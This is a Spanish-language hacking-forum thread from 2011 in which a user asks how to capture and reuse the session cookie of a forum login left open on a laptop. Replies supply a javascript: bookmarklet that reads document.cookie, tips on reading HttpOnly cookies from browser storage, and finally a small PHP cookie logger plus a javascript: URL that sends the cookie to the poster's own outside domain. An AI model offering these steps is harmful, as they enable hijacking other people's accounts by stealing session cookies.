Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: WaAYa HaCK en 16 Julio 2011, 17:24 pm



Título: Conseguir cookies estando ya autenticado
Publicado por: WaAYa HaCK en 16 Julio 2011, 17:24 pm
Hola! Mi caso es el siguiente:

Un día subo la pantalla de mi portátil, veo que está encendido... qué raro... ¡Anda, si me dejé otra sesión abierta en un foro!

Mi pregunta es: teniendo ya la página abierta e identificado como usuario legítimo, cómo puedo hacer para capturar la cookie? ¿Y después, cómo la puedo utilizar?

Tengo un dominio waaya.herobo.com (http://waaya.herobo.com): en él hay un archivo cookie.php que guarda cookies en cookies.txt .

Saludos!


Título: Re: Conseguir cookies estando ya autenticado
Publicado por: Azielito en 1 Agosto 2011, 20:12 pm
en la barra de direcciones pones
javascript:prompt('',document.cookie);void(0);

y ya, seleccionas, copias y pegas =D

el problema es cuando no te guarda la sesion en la cookie sino de otra forma =P


Título: Re: Conseguir cookies estando ya autenticado
Publicado por: Ambr0si0 en 2 Agosto 2011, 01:13 am
en la barra de direcciones pones
javascript:prompt('',document.cookie);void(0);

y ya, seleccionas, copias y pegas =D

el problema es cuando no te guarda la sesion en la cookie sino de otra forma =P

Si la cookie tiene el parametro HTTP ONLY no te imprimirá la cookie.
En este caso no tienes mas que ver donde guardan las cookies tu navegador.
O más simple hay muchas extensiones (al menos en firefox) donde puedes consultar estos valores. CookieManager+


Título: Re: Conseguir cookies estando ya autenticado
Publicado por: WaAYa HaCK en 2 Agosto 2011, 03:25 am
Ok, voy a probar. A ver si puedo entender de una vez todo el mundo de las cookies  :P

Gracias!


Título: Re: Conseguir cookies estando ya autenticado
Publicado por: [u]nsigned en 12 Agosto 2011, 18:28 pm
Seria ams facil asi:

Tu archivo http://waaya.herobo.com/cookie.php deberia tener esto:

Código
  1. <?php
  2. echo urldecode($_GET['c']);
  3. ?>

Entonces en la barra de direcciones  del navegador pegar esto:

Código
  1. javascript:location.href="http://waaya.herobo.com/cookie.php?q="+document.cookie;

Te doy una idea, no el ejemplo completo... :¬¬

Saludos